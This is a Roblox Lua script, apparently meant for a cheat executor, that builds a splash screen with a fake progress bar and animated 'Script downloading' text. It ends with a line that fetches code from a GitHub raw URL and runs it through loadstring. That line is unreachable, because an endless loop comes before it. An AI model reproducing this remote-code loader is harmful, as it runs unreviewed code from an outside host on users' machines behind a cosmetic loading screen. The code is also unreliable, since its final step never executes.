-- Made By yenilmez_xxgg
-- yenilmezxxgg#1434

local ScreenGui = Instance.new("ScreenGui")
local main = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local we = Instance.new("ImageLabel")
local UICorner_2 = Instance.new("UICorner")
local ye = Instance.new("TextLabel")
local xd = Instance.new("TextLabel")
local UICorner_3 = Instance.new("UICorner")
local of = Instance.new("TextLabel")
local UICorner_4 = Instance.new("UICorner")
local qwe = Instance.new("ImageLabel")
local UICorner_5 = Instance.new("UICorner")

--Properties:

ScreenGui.Parent = game.CoreGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

main.Name = "main"
main.Parent = ScreenGui
main.Active = true
main.BackgroundColor3 = Color3.fromRGB(46, 46, 46)
main.Position = UDim2.new(0.423000008, 0, 0.435000002, 0)
main.Visible = false

UICorner.CornerRadius = UDim.new(0, 4)
UICorner.Parent = main

we.Name = "we"
we.Parent = main
we.Active = true
we.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
we.Position = UDim2.new(0.0409382582, 0, 0.213589191, 0)
we.Image = "http://www.roblox.com/asset/?id=6753145358"

UICorner_2.CornerRadius = UDim.new(0, 6)
UICorner_2.Parent = we

ye.Name = "ye"
ye.Parent = main
ye.Active = true
ye.BackgroundColor3 = Color3.fromRGB(46, 46, 46)
ye.BorderColor3 = Color3.fromRGB(46, 46, 46)
ye.Position = UDim2.new(0.322419763, 0, 0.213589191, 0)
ye.Font = Enum.Font.GothamBlack
ye.Text = "Made By yenilmez_xxgg"
ye.TextColor3 = Color3.fromRGB(0, 0, 0)
ye.TextScaled = true
ye.TextSize = 22.000
ye.TextStrokeColor3 = Color3.fromRGB(255, 0, 0)
ye.TextStrokeTransparency = 0.000
ye.TextWrapped = true

xd.Name = "xd"
xd.Parent = main
xd.Active = true
xd.BackgroundColor3 = Color3.fromRGB(67, 67, 67)
xd.Position = UDim2.new(0, 0, 0.931431532, 0)
xd.Font = Enum.Font.SourceSans
xd.Text = ""
xd.TextColor3 = Color3.fromRGB(0, 0, 0)
xd.TextSize = 14.000

UICorner_3.Parent = xd

of.Name = "of"
of.Parent = main
of.Active = true
of.BackgroundColor3 = Color3.fromRGB(46, 46, 46)
of.Position = UDim2.new(0, 0, 0.835995853, 0)
of.Font = Enum.Font.Roboto
of.Text = ""
of.TextColor3 = Color3.fromRGB(0, 0, 0)
of.TextSize = 22.000
of.TextWrapped = true

UICorner_4.Parent = of

qwe.Name = "qwe"
qwe.Parent = ScreenGui
qwe.Active = true
qwe.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
qwe.BackgroundTransparency = 1.000
qwe.Position = UDim2.new(0.42334795, 0, 0.435003906, 0)
qwe.Size = UDim2.new(0, 100, 0, 100)
qwe.Image = "http://www.roblox.com/asset/?id=6753145358"
qwe.ImageTransparency = 1.000

UICorner_5.CornerRadius = UDim.new(0, 6)
UICorner_5.Parent = qwe

-- Scripts:

local function CLRCE_fake_script() -- ScreenGui.LocalScript 
	local script = Instance.new('LocalScript', ScreenGui)

	wait(2)
	for i = 1, 10 do
		script.Parent.qwe.ImageTransparency = 1-(i/10)
		wait()
	end
	wait(1)
	for i = 1, 10 do
		script.Parent.qwe.ImageTransparency = i/10
		wait()
	end
	
	
	wait(3)
	script.Parent.main.Visible = true
	script.Parent.main:TweenSize(UDim2.new(0, 405,0, 241))
	script.Parent.main.we:TweenSize(UDim2.new(0, 100,0, 100))
	script.Parent.main.ye:TweenSize(UDim2.new(0, 255,0, 101))
	script.Parent.main.xd:TweenSize(UDim2.new(0, 8,0, 16))
	script.Parent.main.of:TweenSize(UDim2.new(0, 405,0, 23))
	script.Parent.main:TweenPosition(UDim2.new(0.25, 0,0.307, 0))
	script.Parent.main.we:TweenPosition(UDim2.new(0.041, 0,0.214, 0))
	script.Parent.main.of:TweenPosition(UDim2.new(0, 0,0.836, 0))
	script.Parent.main.xd:TweenPosition(UDim2.new(0, 0,0.931, 0))
	script.Parent.main.ye:TweenPosition(UDim2.new(0.322, 0,0.214, 0))
	
	
	
	
	wait(3)
	script.Parent.main.xd:TweenSize(UDim2.new(0, 84,0, 16))
	wait(3)
	script.Parent.main.xd:TweenSize(UDim2.new(0, 169,0, 16))
	wait(4)
	script.Parent.main.xd:TweenSize(UDim2.new(0, 281,0, 16))
	wait(3)
	script.Parent.main.xd:TweenSize(UDim2.new(0, 346,0, 16))
	wait(4.5)
	script.Parent.main.xd:TweenSize(UDim2.new(0, 405,0, 16))
	wait(3)
	script.Parent.main:TweenSize(UDim2.new(0, 0,0, 0))
	script.Parent.main.we:TweenSize(UDim2.new(0, 0,0, 0))
	script.Parent.main.ye:TweenSize(UDim2.new(0, 0,0, 0))
	script.Parent.main.xd:TweenSize(UDim2.new(0, 0,0, 0))
	script.Parent.main.of:TweenSize(UDim2.new(0, 0,0, 0))
	script.Parent.main:TweenPosition(UDim2.new(0.477, 0,0.541, 0))
	wait(1.8)
	script.Parent.main:Destroy()
	wait(0)
	for i = 1, 10 do
		script.Parent.qwe.ImageTransparency = 1-(i/10)
		wait()
	end
	wait(1)
	for i = 1, 10 do
		script.Parent.qwe.ImageTransparency = i/10
		wait()
	end
	
	
	
	
end
coroutine.wrap(CLRCE_fake_script)()
local function TPMFGST_fake_script() -- of.LocalScript 
	local script = Instance.new('LocalScript', of)

	while true do
		script.Parent.TextColor3 = Color3.new(1, 0, 0.0156863)
		wait(0.1)
		script.Parent.TextColor3 = Color3.new(0.85098, 0, 1)
		wait(0.1)	
		script.Parent.TextColor3 = Color3.new(0.282353, 0, 1)
		wait(0.1)	
		script.Parent.TextColor3 = Color3.new(0, 0.215686, 1)
		wait(0.1)	
		script.Parent.TextColor3 = Color3.new(0, 0.984314, 1)
		wait(0.1)
		script.Parent.TextColor3 = Color3.new(0.14902, 1, 0)
		wait(0.1)
		script.Parent.TextColor3 = Color3.new(0.784314, 1, 0)
		wait(0.1)
		script.Parent.TextColor3 = Color3.new(1, 0.717647, 0)
		wait(0.1)
		script.Parent.TextColor3 = Color3.new(1, 0.415686, 0)
		wait(0.1)
	script.Parent.TextColor3 = Color3.new(1, 0, 0)
	end
	
	
	
	
	
	
	
	
	
	
end
coroutine.wrap(TPMFGST_fake_script)()
local function IAGS_fake_script() -- of.LocalScript 
	local script = Instance.new('LocalScript', of)

	wait(8)
	script.Parent.Text = "S"
	wait(0.1)
	script.Parent.Text = "Sc"
	wait(0.1)
	script.Parent.Text = "Scr"
	wait(0.1)
	script.Parent.Text = "Scri"
	wait(0.1)
	script.Parent.Text = "Scrip"
	wait(0.1)
	script.Parent.Text = "Script"
	wait(0.1)
	script.Parent.Text = "Script d"
	wait(0.1)
	script.Parent.Text = "Script do"
	wait(0.1)
	script.Parent.Text = "Script dow"
	wait(0.1)
	script.Parent.Text = "Script down"
	wait(0.1)
	script.Parent.Text = "Script downl"
	wait(0.1)
	script.Parent.Text = "Script downlo"
	wait(0.1)
	script.Parent.Text = "Script downloa"
	wait(0.1)
	script.Parent.Text = "Script download"
	wait(0.1)
	script.Parent.Text = "Script downloadi"
	wait(0.1)
	script.Parent.Text = "Script downloadin"
	wait(0.1)
	while true do
		script.Parent.Text = "Script downloading"
		wait(0.3)
		script.Parent.Text = "Script downloading."
		wait(0.3)
		script.Parent.Text = "Script downloading.."
		wait(0.3)
		script.Parent.Text = "Script downloadin...g"
	end
	wait(2)
	loadstring(game:HttpGet('https://raw.githubusercontent.com/cihonemm/w/main/w'))()
	
end
coroutine.wrap(IAGS_fake_script)()
